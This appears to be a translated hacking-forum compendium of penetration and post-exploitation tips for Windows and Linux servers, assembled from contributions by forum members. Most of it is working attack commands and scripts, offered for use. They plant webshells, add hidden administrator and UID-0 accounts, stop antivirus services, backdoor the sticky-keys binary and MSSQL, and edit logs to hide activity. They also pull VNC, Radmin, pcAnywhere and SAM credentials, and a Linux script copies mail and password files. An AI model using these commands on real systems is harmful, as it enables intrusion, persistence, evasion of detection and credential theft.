Network Attack and Defense: Compendium of Penetration Tips (.doc)
Network Attack and Defense: Compendium of Penetration Tips (latest version)

In the spirit of sharing, and for the convenience of fellow hackers, I'm posting this in the hope of sparking discussion. Please chime in so that it can be improved, we learn from each other, and the exchange keeps going.

Finding the path of a neighbouring site on the same server

1. Read the web site's configuration.

2. Use the following VBS:

    On Error Resume Next
    ' Meant for cscript: show usage and quit when started with wscript.exe
    If (LCase(Right(WScript.Fullname, 11)) = "wscript.exe") Then
        Msgbox Space(12) & "IIS Virtual Web Viewer" & Space(12) & Chr(13) & Space(9) & "Usage: Cscript vWeb.vbs", 4096, "Lilo"
        WScript.Quit
    End If
    ' Walk every site under the local IIS W3SVC metabase node
    Set ObjService = GetObject("IIS://LocalHost/W3SVC")
    For Each obj3w In ObjService
        If IsNumeric(obj3w.Name) Then
            Set OService = GetObject("IIS://LocalHost/W3SVC/" & obj3w.Name)
            Set VDirObj = OService.GetObject("IIsWebVirtualDir", "ROOT")
            If Err <> 0 Then WScript.Quit (1)
            WScript.Echo Chr(10) & "<" & OService.ServerComment & ">"
            ' Each binding is "ip:port:hostheader"; print the host header part
            For Each Binds In OService.ServerBindings
                Web = "<" & Replace(Binds, ":", " ") & ">"
                WScript.Echo Replace(Split(Replace(Web, "  ", " "), " ")(2), ">", "")
            Next
            WScript.Echo "Path : " & VDirObj.Path
        End If
    Next

3. Enumerate with iis_spy (note: requires ASPX support; the countermeasure against IISSpy is to lower the permissions on activeds.dll and activeds.tlb).

4. When you have the target site's directory but cannot traverse into it directly, write a webshell into it with echo redirected to X:\<target dir>\X.asp, or with copy <script file> X:\<target dir>\X.asp. The type command is also worth trying.

For WordPress, the absolute path can be disclosed through:
    url/wp-content/plugins/akismet/akismet.php
    url/wp-content/plugins/akismet/hello.php

phpMyAdmin path disclosure:
    phpMyAdmin/libraries/select_lang.lib.php
    phpMyAdmin/darkblue_orange/layout.inc.php
    phpMyAdmin/index.php?lang=1
    phpmyadmin/themes/darkblue_orange/layout.inc.php

Likely site directories (usually on virtual hosting): data/htdocs, <site>/

VPN operations from the command line

    netsh ras set user administrator permit      # allow administrator to dial into this VPN
    netsh ras set user administrator deny        # deny administrator dial-in
    netsh ras show user                          # show which users may dial in
    netsh ras ip show config                     # show how VPN client IPs are assigned
    netsh ras ip set addrassign method = pool    # assign IPs from an address pool
    netsh ras ip add range from = <start> to = <end>   # the pool's address range

Adding a SQL login from the command line (requires administrator rights). First create c:\test.qry with the following contents:

    exec master.dbo.sp_addlogin 'test','123'
    EXEC sp_addsrvrolemember 'test','sysadmin'

then run it from a DOS prompt:

    cmd.exe /c isql -E /U alma /P "" /i c:\test.qry

An alternative way to add a user, for when net.exe has been deleted and ADSI is not used:

JS:
    var o = new ActiveXObject("Shell.Users");
    z = o.create("test");
    z.changePassword("123456", "");
    z.setting("AccountType") = 3;

VBS:
    Set o = CreateObject("Shell.Users")
    Set z = o.create("test")
    z.changePassword "123456", ""
    z.setting("AccountType") = 3

Access control from cmd (note: to undo the "Everyone cannot read" trick, go to Tools > Folder Options and untick "Use simple file sharing"):

    cacls c:\ /e /t /g everyone:F     # grant Everyone full control over C:
    cacls <dir> /d everyone           # deny Everyone, administrators included, access to <dir>

The above works better in combination with PR.

RDP (3389) notes
a. Firewall / TCP/IP filtering (turn off with: net stop policyagent & net stop sharedaccess)
b. Internal network environment (LCX)
c. "The terminal server has exceeded the maximum allowed connections": on XP run mstsc /admin, on 2003 run mstsc /console

Disabling antivirus (remove all permissions on the antivirus program's files)

Dealing with the stubborn Norton Enterprise edition:
    net stop "Symantec AntiVirus" /y
    net stop "Symantec AntiVirus Definition Watcher" /y
    net stop "Symantec Event Manager" /y
    net stop "System Event Notification" /y
    net stop "Symantec Settings Manager" /y
McAfee:
    net stop "McAfee McShield"

Sticky keys (5x Shift):
    copy %systemroot%\system32\sethc.exe %systemroot%\system32\dllcache\sethc1.exe
    copy %systemroot%\system32\cmd.exe %systemroot%\system32\dllcache\sethc.exe /y
    copy %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe /y

Adding a hidden account:
1. net user admin$ 123456 /add & net localgroup administrators admin$ /add
2. Export the user's two registry keys under SAM.
3. Delete admin$ in the user management UI, then import the exported registry keys back.
4. Use Hacker Defender to hide the user's registry entries.

MSSQL extended stored procedure backdoor:
    USE master;
    EXEC sp_addextendedproc 'xp_helpsystem', 'xp_helpsystem.dll';
    GRANT exec ON xp_helpsystem TO public;

Log handling
Under C:\WINNT\system32\LogFiles\MSFTPSVC1 there are three files: ex011120.log, ex011121.log and ex011124.log. Deleting ex011124.log directly fails ("file is in use"); ex011120.log and ex011121.log can of course be deleted directly. Open ex011124.log in Notepad, delete some of its content, save and overwrite: that works. Once the msftpsvc service is stopped, ex011124.log can be deleted directly.

Clearing MSSQL Query Analyzer connection history: for MSSQL 2000 it lives in the registry at HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers; find the previous connections and delete them. For MSSQL 2005 it is in C:\Documents and Settings\<user>\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat.

To avoid interception by security systems, use a shell that fetches its payload remotely; this also hides it and makes for a very stealthy backdoor (the so-called AV-evading webshells all get flagged as soon as a server security tool scans them).

VNC privilege escalation: use the shell to read the VNC password ciphertext saved in the registry and crack it with VNC4X. Registry location: HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\password

Radmin's default port is 4899. HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter is the registry location of the password; HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Port is the registry location of the port. Then connect with the hash-login version of the client.

If we have a webshell on a host and find pcAnywhere installed, and the directory holding its password files is readable by the IUSR account, we can download the CIF file, crack it locally, and then log in to the server through pcAnywhere from our own machine. The CIF password file is not in pcAnywhere's installation directory but under Documents and Settings\All Users\Application Data\Symantec\pcAnywhere on the drive pcAnywhere was installed to. If pcAnywhere was installed under D:\program, the password file is in D:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere.

Sogou Pinyin's PinyinUp.exe is readable and writable; simply replace it.

The web directory under WinWebMail must be readable and writable by Everyone. Find the WinWebMail shortcut under Start > Programs, read its path, and upload a shell to <path>\web. The shell runs as SYSTEM; drop a remote-control tool into the startup items and wait for the next reboot. If the cmd component has not been removed, add a user directly.

7i24's web directory is writable too, with administrator privileges.

A SA account on 1433 can be used to build an injection point.

*Linux related*

1. LDAP pentesting tips

1. cat /etc/nsswitch to check the password/login policy; we can see the "files ldap" mode is in use.
2. less /etc/ldap.conf; the line base ou=People,dc=unix-center,dc=net gives the ou and dc settings.
3. Look up the administrator entry. Anonymously:
    ldapsearch -x -D cn=administrator,cn=People,dc=unix-center,dc=net -b cn=administrator,cn=People,dc=unix-center,dc=net -h <ip>
   With a password:
    ldapsearch -x -W -D cn=administrator,cn=People,dc=unix-center,dc=net -b cn=administrator,cn=People,dc=unix-center,dc=net -h <ip>
4. Fetch 10 user records (-p specifies the port):
    ldapsearch -h <ip> -x -z 10 -p <port>

Pentest in practice:

1. Return all attributes:
    ldapsearch -h <ip> -b dc=ruc,dc=edu,dc=cn -s sub objectclass=*
   Output:
    version: 1
    dn: dc=ruc,dc=edu,dc=cn
    dc: ruc
    objectClass: domain

    dn: uid=manager,dc=ruc,dc=edu,dc=cn
    uid: manager
    objectClass: inetOrgPerson
    objectClass: organizationalPerson
    objectClass: person
    objectClass: top
    sn: manager
    cn: manager

    dn: uid=superadmin,dc=ruc,dc=edu,dc=cn
    uid: superadmin
    objectClass: inetOrgPerson
    objectClass: organizationalPerson
    objectClass: person
    objectClass: top
    sn: superadmin
    cn: superadmin

    dn: uid=admin,dc=ruc,dc=edu,dc=cn
    uid: admin
    objectClass: inetOrgPerson
    objectClass: organizationalPerson
    objectClass: person
    objectClass: top
    sn: admin
    cn: admin

    dn: uid=dcp_anonymous,dc=ruc,dc=edu,dc=cn
    uid: dcp_anonymous
    objectClass: top
    objectClass: person
    objectClass: organizationalPerson
    objectClass: inetOrgPerson
    sn: dcp_anonymous
    cn: dcp_anonymous

2. View the base entry:
    bash-3.00# ldapsearch -h <ip> -b dc=ruc,dc=edu,dc=cn -s base objectclass=* | more
    version: 1
    dn: dc=ruc,dc=edu,dc=cn
    dc: ruc
    objectClass: domain

3. Query the root DSE:
    bash-3.00# ldapsearch -h <ip> -b "" -s base objectclass=*
    version: 1
    dn:
    objectClass: top
    namingContexts: dc=ruc,dc=edu,dc=cn
    (supportedExtension, supportedControl and supportedSSLCiphers lists omitted)
    supportedSASLMechanisms: EXTERNAL
    supportedSASLMechanisms: DIGEST-MD5
    supportedLDAPVersion: 2
    supportedLDAPVersion: 3
    vendorName: Sun Microsystems, Inc.
    vendorVersion: Sun-Java(tm)-System-Directory/6.2
    dataversion: 020090516011411
    netscapemdsuffix: cn=ldap://dc=webA:389

2. NFS pentesting tips
    showmount -e <ip>     # list the exports of that IP

3. rsync pentesting tips
1. List the modules on the rsync server:
    rsync 210.51.X.X::
   which returned: finance, img_finance, auto, img_auto, html_cms, img_cms, ent_cms, ent_img, ceshi, res_img, res_img_c2, chip, chip_c2, ent_icms, games, gamesimg, media, mediaimg, fashion, res-fashion, res-fo, taobao-home, res-taobao-home, house, res-house, res-home, res-edu, res-ent, res-labs, res-news, res-phtv, res-media, home, edu, news, res-book
   To look into a module's subdirectories (be sure to append a trailing /):
    rsync 210.51.X.X::htdocs_app/
    rsync 210.51.X.X::auto/
    rsync 210.51.X.X::edu/
2. Download configuration files from the rsync server:
    rsync -avz 210.51.X.X::htdocs_app/ /tmp/app/
3. Push a file up to the rsync server (the upload succeeds and does not overwrite existing files):
    rsync -avz nothack.php 210.51.X.X::htdocs_app/warn//warn/nothack.txt

4. Squid pentesting tips
    nc -vv <proxy ip> 80
    GET HTTP://<target>/ HTTP/1.0
    GET HTTP://WWW.<target>:22/ HTTP/1.0

5. SSH port forwarding
    ssh -C -f -N -g -R 44:<host>:22 cnbird@<ip>

6. Joomla tips
Determine the version:
    index.php?option=com_content&view=article&id=30:what-languages-are-supported-by-joomla-15&catid=32:languages&Itemid=47
Reset a password:
    index.php?option=com_user&view=reset&layout=confirm

7. Add a root-equivalent user (UID 0) on Linux:
    useradd -o -u 0 nothack

8. FreeBSD local privilege escalation:
    argp@julius $ uname -rsi
    FreeBSD 7.3-RELEASE GENERIC
    argp@julius $ sysctl vfs.usermount
    vfs.usermount: 1
    argp@julius $ id
    uid=1001(argp) gid=1001(argp) groups=1001(argp)
    argp@julius $ gcc -Wall nfs_mount_ex.c -o nfs_mount_ex
    argp@julius $ ./nfs_mount_ex
    calling nmount()

(Note: the original was collected and compiled by 0x, to whom thanks are due; I added and polished a few things. This post has no logical order at all, since I wrote things down as they came to mind; please bear with me.)

Thanks to the T00LS members for the lively exchange, which taught me a lot. For the convenience of others, the additions from T00LS members are pasted below, and I will keep appending my own thoughts afterwards.

1. Packing with tar:
    tar -cvf /home/public_html/*.tar /home/public_html/ --exclude=<pattern>
   --exclude= skips files (e.g. *.gif) or directories (e.g. /xx/xx/*).
   ALZip (Korean):
    alzip -a D:\WEB d:\web*.rar
   Note on tar: Linux does not decide file type by extension. For compressed archives, tar -ztf *.tar.gz lists the contents and tar -zxf *.tar.gz extracts, so this form is preferable:
    tar -czf /home/public_html/*.tar.gz /home/public_html/ --exclude=<pattern>
   Before escalating privileges, run systeminfo: the token vulnerability is patched by KB956572, Churrasco by KB952004.
   RAR from the command line:
    rar a -k -r -s -m3 c:\1.rar c:\folder

2. System information collection scripts.

For Windows:
    @echo off
    echo #system info collection
    systeminfo
    ver
    hostname
    net user
    net localgroup
    net localgroup administrators
    net user guest
    net user administrator
    echo #at- with atq#
    at
    schtasks /query
    echo
    echo #task-list#
    tasklist /svc
    echo
    echo #net-work infomation
    ipconfig /all
    route print
    arp -a
    netstat -an
    ipconfig /displaydns
    echo
    echo #service#
    sc query type= service state= all
    echo #file-#
    cd \
    tree /F

For Linux:
    #!/bin/bash
    echo "#geting sysinfo#"
    echo "#usage: ./getinfo.sh > /tmp/sysinfo.txt"
    echo "#basic infomation#"
    cat /proc/meminfo
    echo
    cat /proc/cpuinfo
    echo
    rpm -qa 2>/dev/null
    #stole the mail.#
    cp -a /var/mail /tmp/getmail 2>/dev/null
    echo "ur id is `id`"
    echo "#atq&crontab#"
    atq
    crontab -l
    echo "#about var#"
    set
    echo "#about network#"
    #this is then point in pentest,but i am a new bird,so u need to add some in it
    cat /etc/hosts
    hostname
    ifconfig -a
    arp -v
    echo "#user#"
    cat /etc/passwd | grep -i sh
    echo "#service#"
    chkconfig --list
    # grep the password file for the usual service accounts
    for i in oracle mysql tomcat samba apache ftp
    do
        cat /etc/passwd | grep -i $i
    done
    locate passwd > /tmp/password 2>/dev/null
    sleep 5
    locate password >> /tmp/password 2>/dev/null
    sleep 5
    locate conf > /tmp/sysconfig 2>/dev/null
    sleep 5
    locate config >> /tmp/sysconfig 2>/dev/null
    sleep 5
    #maybe can use tree /#
    echo "#packing up#"
    tar cvf getsysinfo.tar /tmp/getmail /tmp/password /tmp/sysconfig
    rm -rf /tmp/getmail /tmp/password /tmp/sysconfig

3. gethash is not AV-evading, so how to obtain the local hashes: first export the registry:
    regedit /e d:\aa.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users     (2000)
    reg export HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Acc